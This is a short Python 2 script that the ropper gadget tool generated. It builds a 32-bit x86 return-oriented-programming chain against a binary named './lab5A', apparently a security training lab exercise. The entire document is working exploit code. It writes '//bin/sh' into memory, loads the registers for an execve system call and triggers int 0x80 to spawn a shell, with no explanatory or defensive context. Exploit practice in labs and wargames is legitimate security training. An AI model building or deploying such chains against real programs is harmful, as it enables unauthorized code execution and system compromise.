


[*] Try permuation 1 / 24

#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # ./lab5A
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000744d6) # 0x080bc4d6: pop eax; ret; 
rop += '//bi'
rop += rebase_0(0x000273aa) # 0x0806f3aa: pop edx; ret; 
rop += rebase_0(0x000a4060)
rop += rebase_0(0x0005accd) # 0x080a2ccd: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x000744d6) # 0x080bc4d6: pop eax; ret; 
rop += 'n/sh'
rop += rebase_0(0x000273aa) # 0x0806f3aa: pop edx; ret; 
rop += rebase_0(0x000a4064)
rop += rebase_0(0x0005accd) # 0x080a2ccd: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x000744d6) # 0x080bc4d6: pop eax; ret; 
rop += p(0x00000000)
rop += rebase_0(0x000273aa) # 0x0806f3aa: pop edx; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x0005accd) # 0x080a2ccd: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x0001c1dd) # 0x080641dd: pop ebx; ret; 
rop += rebase_0(0x000a4060)
rop += rebase_0(0x0009e255) # 0x080e6255: pop ecx; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x000273aa) # 0x0806f3aa: pop edx; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x000744d6) # 0x080bc4d6: pop eax; ret; 
rop += p(0x0000000b)
rop += rebase_0(0x00027a80) # 0x0806fa80: int 0x80; ret; 
print rop
